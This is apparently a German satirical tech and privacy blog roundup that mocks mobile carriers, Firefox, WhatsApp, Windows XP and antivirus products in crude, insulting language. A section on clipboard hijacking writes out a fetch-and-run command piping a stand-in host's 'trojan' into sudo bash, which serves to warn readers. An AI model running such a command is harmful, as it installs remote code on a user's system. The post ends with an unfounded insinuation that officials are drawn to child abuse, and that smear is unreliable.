5G des tages

Habt ihr auch alle vom onkel werber und seinem stinkenden bruder jornalist gehört, dass wir echt jetzt mal und ganz dringend 5G brauchen, weil 4G viel zu langsam ist? Und dann kommt euch die scheiße im datenfeldwegland BRD gleich noch lahmer vor? Das liegt aber nicht an 4G, sondern an den unternehmen, denen ihr viel geld dafür gebt, dass sie euch internetz aufs telefon funken:

Eine aktuelle Auswertung der deutschen Mobilfunknetze zeigt ganz klar: Zwar werben die großen Anbieter Telekom, Vodafone und O2 mit hohen Datenraten bei 4G, diese kommen in der Realität aber bei kaum einem Kunden an – im Gegenteil: Im Durchschnitt ermittelt die Studie eine Geschwindigkeit von 30 Megabit pro Sekunde […] So wirbt Vodafone aktuell mit einer theoretischen Maximalgeschwindigkeit von 500 Mbps, die Telekom schreibt in ihren Werbematerialien, dass bis zu 300 Mbps erreicht werden können. Telefónica (O2) nimmt den Mund mit einer beworbenen Datenrate von 225 Mbps noch am wenigsten voll

Und das wird sich auch mit 5G nicht ändern. Es wird nur teurer werden, wenn es demnächst 5G heißt, aber die möglichen datenraten gar nicht erreicht werden. Denn mit den BRD-bewohnern kann man das alles machen, die lassen sich alles gefallen und auf jede nur denkbare weise abzocken, ohne dass die auf solche grenzkriminellen unverschämtheiten so reagieren, wie es sich gebührt.

Na, hat hier jemand an sicherheit durch biometrie geglaubt?

Die üblichen Datenkombinationen mit E-Mail-Adressen und Passwörtern sind heute in manchen Fällen nicht mehr ausreichend. Und quasi schon folgerichtig tauchten nun auf dem Schwarzmarkt die ersten Sammlungen auf, in denen auch tausende Datensätze zu analysierten Fingerabdrücken enthalten waren

Ich wünsche euch viel spaß beim wexeln eures fingerabdruckes! Ist fast so einfach wie der wexel eines passwortes. Finger abschneiden, neuen finger drannähen. Oder wart ihr alle schlau?

Datenschleuder des tages

Hat sich jemand bei diesem „mega“ von Kim „dotcom“ Schmitz angemeldet?

Der selbsternannte Sicherheitsexperte und Hacker Kim Dotcom kann die Daten von Nutzern letztlich nicht viel besser schützen als viele andere, die eigene Dienste im Netz starten. Das zeigt nun ein Vorfall, bei dem tausende Einträge einer User-Datenbank des von ihm gegründeten Filehosters Mega öffentlich im Netz aufgetaucht sind

Auch weiterhin viel spaß mit der sicherheit und dem datenschutz, die euch überall versprochen werden! Die liste wäxt und wäxt und wäxt

Fratzenbuch des tages

Das fratzenbuch hat ja wattsäpp aufgekauft, um seinen datenbestand ein bisschen zu vergrößern, und zurzeit greift es richtig zu:

Nutzer des populären WhatsApp-Messengers sollten aktuell besser den Datenverbrauch der App im Auge behalten. Denn ein Bug in der Backup-Funktion führte bei einigen Anwendern dazu, dass plötzlich riesige Mengen Daten in die Cloud geschoben wurden – und das auch gern mal, wenn nur das Mobilfunknetz zur Verfügung stand […] So berichtet ein Kollege von Smartdroid, dass WhatsApp plötzlich ein ganzes Gigabyte in die Cloud schieben wollte. Vor der Fertigstellung kam es aber zu einem Problem mit der Netzverbindung und es ging mit einem mehr als doppelt so großen Datenpaket von vorn los

Macht ja nix, sagt man sich beim fratzenbuch, müssen ja die nutzer für bezahlen. :mrgreen:

Security des tages

Benutzt hier jemand ein ändräut-wischofon?

Ich wünsche auch weiterhin viel spaß mit den „sauberen“ dieselmot… ähm… bei der „sicheren“ fernkontoführung mit dem händi! Grüßt die banken und sparkassen von mir! Und vergesst nicht, dass bargeld echt unbekwem ist, so dass ihr immer mit dem händi bezahlt!

Besser und schneller

Dieser webbrauser namens feierfox, der nicht nur von nach vergorener scheiße stinkenden scheißpresseverlegern zur distribuzjonsplattform für schadsoftwäjhr gemacht wurde, sondern seit jahren immer träger und speicherfressender wird, wird seit jahren in den PResseerklärungen der schadsoftwäjhr-klitsche „mozilla foundation“ als eine softwäjhr bezeichnet, die demnächst noch besser und noch schneller werden soll.

Und seit jahren schreiben irgendwelche frontfressen der alfabloggeria und irgendwelche scheißjornalisten diese selbst für laien mühelos durchschaubare scheißlüge ab, ganz so, als ob ihre leser kein gehirn hätten…

Ja, winfuture, ihr seid gemeint!

Wie Konkurrent Chrome wird auch Firefox künftig Anzeigen, die das Nutzungserlebnis grob beeinträchtigen, blocken

Oh, prima. Ich nehme aber lieber einen wirksamen adblocker, der alle ads blockt, um meinen rechner vor „malvertising“ zu schützen.

[…] will Mozilla mit dem Blocken von Cross-Domain-Tracking arbeiten

Wie, wird der scheißfeierfox jetzt etwa die HTTP-header ein bisschen reduzieren und standardmäßig nicht mehr so auskunftsfreudig über javascript sein? Soll es jetzt endlich mal eine verdammte standardeinstellung werden, dass „cookies“ aus drittkwellen nicht akzeptiert werden, um webseit-übergreifendes träcking zu erschweren? (Das kann man übrigens von hand so einstellen. Es ist sehr gut versteckt.) Endlich? Nach all diesen jahrzehnten des mit dreckigen stiefeln getretenen bedürfnisses einiger menschen nach privatsfäre?

Tracking-Schutz soll generell ausgebaut werden, u. a. sollen Nutzer bessere Möglichkeiten bekommen, diesen zu steuern

Und die nutzer bekommen teilweise gleichzeitig einen trojaner untergejubelt, der mausbewegungen zu burda funkt? Wenns nicht so erbärmlich wäre, bekäme ich wohl bauchschmerzen vom lachen.

Firefox soll künftig Autoplay-Videos blockieren können

Juchu! Was für eine neuerung!

Lücken-Warnungen für Seiten, die in Vergangenheit als unsicher und kompromittiert aufgefallen sind

Hej, gehören dann auch die ganzen webseits mit werbebannern aus drittkwellen dazu? Ach, das geht nicht, weil es gegen die interessen der geldgeber der schadsoftwäjhr-klitsche „mozilla foundation“ ginge? Na gut, dann eben eine schnittstelle für die „gefühlte sicherheit“, die sich übrigens prächtig als gut wirksame zensurinfrastruktur verwenden lässt.

Schnellerer Start von Fenstern: Ein Browserfenster soll schneller auftauchen, erst danach wird der restliche Stack geladen

Das finden wir alle ganz toll, wenn das fenster schnell da ist, aber erst nach einer halben minute benutzbar wird. Das ist ein riesen fortschritt!!1!

Verbesserungen an der Interpreter-Geschwindigkeit: Das soll die Leistung von JavaScript auf Webseiten und in Apps optimieren

Jaou, macht den webbrauser zur besseren „runtime“ für äpps! Jene zeitgenossen, die irgendwelche kryptogeld-berechnungs-trojaner in dieser aufgeblähten, ineffizjenten und stromfressenden „runtime“ laufen lassen, werden sich darüber freuen.

Object-biased NaN Boxing: Soll JavaScript-Performance auf Webseiten verbessern

Die Steigerung von BINGO heißt Bingo GOLD

Tab Warming: Das „Auf- oder Vorwärmen“ von Tabs soll jene Reiter vorzeitig laden, zu denen der Nutzer wahrscheinlich als nächstes wechselt

Und um das zu ermöglichen, wird sicherlich eine kleine lokale datenbank über das nutzerverhalten angelegt. Mal schauen, wie schnell die in andere hände gerät oder wie schnell irgendwelche überwachungswerber daraus eine träckingfunkzjon bauen können.

UTF Parsing: Verbessert die Ladezeiten mit vielen JavaScript-Skripten

Ich denke, vor möglicherweise unsicheren seits soll gewarnt werden. Wo ist denn die warnung „diese webseit importiert javascript-kohd aus 23 externen webseits und gefährdet damit ihre privatsfäre“? Ach, die ist nicht erwünscht.

WebRender: Soll Apps mit 60 Frames pro Sekunde ausführen, unabhängig vom Display oder was sich zwischen den einzelnen Frames auf der Seite verändert

Juchu! Die scheißwerber werden sich freuen, weil sie mit noch nervigerer scheißwerbung an der aufmerksamkeit des nutzers rumzerren können. Scheiß auf die volle auslastung von acht rechenkernen! Werbung ist wichtig!

Lockbox Password Manager soll den bisherigen Passwort-Manager ersetzen

Und, wird der sein masterpasswort genau so unsicher wegspeichern wie der gegenwärtige passwort-mänätscher?

Neue Extension-APIs

Die alten APIs wären aber wohl erwünschter, denn mit ihnen könnte man die alten addons weiterbenutzen. Aber scheiß drauf, zielgruppe ist die generazjon wischofon, und die kennt keine addons, die kennt nur wischibunti und alles so schön bunt hier.

Themes-Verbesserungen: Weitere Browser-Bereiche sollen anpassbar werden, dazu kommt eine neue Theme-API

Juchu, alte anpassungen des erscheinungsbildes werden nicht funkzjonieren. Daran haben sich ja jetzt schon alle bei den addons gewöhnt.

Auch weiterhin viel spaß mit den ganzen hanseln, die PResseerklärungen abschreiben und so tun, als seien sie informativ!

„Internetz der dinge“ und „geistiges eigentum“ des tages

Angesichts des begonnenen Winters hat ein US-Provider jetzt eine recht drastische Drohung an Nutzer gerichtet, die zu viele Urheberrechtsverletzungen im Netz begehen: Sie müssten damit rechnen, ihre Heizungs-Thermostate zukünftig nicht mehr von unterwegs bedienen zu können, damit es bei der Heimkehr warm ist

Freut ihr euch auch schon so auf die „smarten“ autos? :mrgreen:

Überwachung des tages

Na, eine billige tastatur gekauft? Nicht darüber wundern, wenn alles, was ihr darauf tippt, nach china gefunkt wird. Aber hej, seid beruhigt und schlaft weiter, das dient nur der statistik… ähm… über das, was ihr so auf den tasten tippt, da werden keine daten gesammelt und alles ist völlig harmlos. Das merkt ihr ja schon daran, dass es heimlich gemacht wird, denn wenn es nicht harmlos wäre, würde man es euch ja mitteilen. Und außerdem ist die tastatur schön billig. Und daran, dass alles mit eingebauten und deinstallierbaren trojanern ausgeliefert wird, seid ihr doch auch schon von euren wischofonen gewöhnt, das ist also kein grund zur beunruhigung.

Ach ja, ich wünsche auch weiterhin viel spaß bei der internetzbasierten fernkontoführung! Was kann dabei schon schiefgehen? :mrgreen:

☑ Ich habe die nutzungsbedingungen gelesen und bin einverstanden…

Genau so klingt die häufigste lüge im internet.

„Gefährliche“ AGB: 22.000 Nutzer erklärten sich zum Kloputzen bereit

Aber auch weiterhin gilt dieses literarisch ungenießbare augenpulver, das kein mensch liest und das vorsätzlich so geschrieben wird, dass es kein mensch liest, als bestandteil eines vertrages.

Windohs XP des tages

Für Windows Vista, veröffentlicht im Jahr 2007, und Windows XP, erschienen im Jahr 2001, hat Microsoft heute überraschenderweise zum Juni Patch-Day wichtige Aktualisierungen herausgegeben […] Zum Juni-Patch-Day folgen nun Schwachstellen in Vista und XP, die so wie es Microsoft mitteilt gegen potentielle Angriffsrisiken durch staatliche Hackerangriffe schützen sollen. Gemeint ist damit wohl die Gefahr durch weitere durch WikiLeaks veröffentlichte CIA-Spionage-Tools wie „Athena“, zumindest legen die derzeit verfügbaren Informationen diesen Zusammenhang nahe

Vielleicht sollten die ganzen banken und behörden mal ernsthaft drüber nachdenken, sich vom inzwischen uralten windohs XP zu verabschieden. Denn für alle zeiten kann man kaum auf die bereitschaft meikrosofts hoffen, in längst nicht mehr unterstützten systemen ausbeutbare fehler zu fixen.

Javascript des tages

Na, linuxer! Schon einmal kohd für die kommandozeile aus dem brauser ins terminal kopiert? Praktische schnippsel gibts ja in jedem forum. Ist aber keine gute idee, wenn man dabei javascript im brauser gestattet, denn javascript kann den inhalt der zwischenablage verändern. Ist schon kacke, wenn man sudo apt-get install blah ins terminalfenster kopiert hat und schließlich curl http://fuck.up/trojan | sudo bash ausführt und hinterher einen rechner anderer leute auf dem schreibtisch stehen hat. 😀

Und nein, das ist keine teoretische gefahr. Selbst auf einer vertrauenswürdigen webseit könnte ein entsprechender kohd über ein werbebanner oder eine XSS-lücke im forensystem oder CMS untergejubelt werden.

Denn was in der Zwischenablage landet, lässt sich nicht ohne Weiteres kontrollieren. So wäre es durchaus denkbar, dass der Nutzer mit einer interessanten Funktion für die Kommandozeile mögliche Opfer anlockt und ihnen hier etwa Code unterschiebt, der die Sicherheit des Systems beeinträchtigt oder Schäden hervorruft. Daher sollte man Inhalte, die aus einer Webseite kopiert wurden, nicht direkt in die Eingabeaufforderung einfügen – sondern zur Sicherheit besser erst einmal in einen Texteditor, wo sich ohne Risiko überprüfen lässt, was in der Zwischenablage landete

Ich muss widersprechen! Darum sollte man immer, immer, immer javascript abschalten, wenn es nicht unbedingt technisch erforderlich ist. Javascript ist die mutter aller modernen sicherheitsprobleme im webbrauser (und außerdem der inbegriff aller dinge, die im gegenwärtigen web völlig falsch laufen und gestoppt werden müssen). Die verwendung von noscript ist ein absolutes muss, wichtiger und wirksamer als jedes antivirus-schlangenöl; und das privileg der javascript-ausführung sollte so restriktiv vergeben werden, wie es gerade noch möglich ist. Dass man die webbildzeitung so nicht mehr lesen kann, wird kein fühlendes wesen als einschränkung empfinden…

Ändräut des tages

Verbraucherschützer verklagen Samsung auf Android-Updates

Tja, mit meikrosoft wär das nicht passiert… :mrgreen:

Auch weiterhin viel spaß mit euren wischofonen, die vor allem dafür gemacht sind, ganz schnell zu müll zu werden! Ist ja nur ein bisschen bitter verdientes geld, das ihr damit verbrennt. Und eurer bisschen würde. Und ein bisschen kompjutersicherheit. Und eure freunde und kontakte, deren daten ihr in den wischofonen gespeichert habt und damit an alles mögliche lichtscheue pack ausliefert. Also fast nix. Alles total hipp und toll! Los, gleich das näxste, bessere, tollere kaufen! Weil es besser, toller und das näxste ist! Jeder nur eine lobotomie!

Schlangenöl des tages

AVG will als Antiviren-Anbieter das Web sicherer machen und den Computer des Nutzers schützen. So ist jedenfalls die Theorie bzw. der Optimalfall. Doch laut Tavis Ormandy, einem Sicherheitsforscher bei Googles Project Zero-Initiative, macht die Chrome-Erweiterung von AVG genau das Gegenteil, da sie von Schwachstellen regelrecht durchsiebt ist bzw. war

Auch weiterhin viel spaß mit der gefühlten sicherheit durch schlangenöl-programme! Direkt unter dem artikel kann man auch gleich ein paar andere runterladen. Die machen in ein paar wochen dann die näxste meldung… :mrgreen:

Netzwerkgerät (und internetz der dinge) des tages

Um auf diesem Weg Malware in die Drucker zu pflanzen, muss lediglich eine nicht besonders starke Verschlüsselung aufgebrochen werden. Dass dies prinzipiell möglich ist, zeigten die Experten, indem sie ein Gerät mit einer Firmware ausstatten, die das Spiel Doom auf den kleinen Status-Displays laufen ließ

Das häckchen gefällt mir! 😀

Ohne gewähr…

Ohne gewähr und ohne, dass ich das selbst ausprobiert hätte, hier ein link auf einen tipp, wie man für sein windohs XP — alarm, alarm, das ist über nacht unsicher geworden, weil meikrosoft die fehler nicht mehr flickt — noch bis zum jahr 2019 flicken für die fehler bekommen kann. Natürlich kostenlos.

Und jetzt die verschwörungsteorie: Es würde mich ja nicht wundern, wenn meikrosoft diese kleine info in die drexpresse tröpfeln lässt, denn dass die leute massenhaft auf andere betriebssysteme umsteigen, weil die alten kompjuter viel zu schade zum wegwerfen sind, das kann meikrosoft noch viel weniger passen als eine weiternutzung von windohs XP. Denn wer erstmal von windohs weg ist und sich umgewöhnt hat, kommt nicht so schnell zurück.

Schlagzeile des tages

UK: Pornofilter-Macher wg. Kinderpornos verhaftet

Immer wieder bemerkenswert, in welchen kreisen man sich so an bildern von kindern aufgeilt — vor allem, wenn ich daran denke, dass ich keinen einzigen menschen aus meinem umfeld kenne, der solche neigungen hat. Es kommt mir im moment immer wieder so vor, als sei diese lust, wehrlose, ausgelieferte wesen durchzuficken mit einem karakter verbunden, den es in die verwaltung, polizei oder p’litik (oder in ihre direkte nähe) drängt. :mrgreen:

Nachtrag 21:30 uhr: danke, Fefe! 😉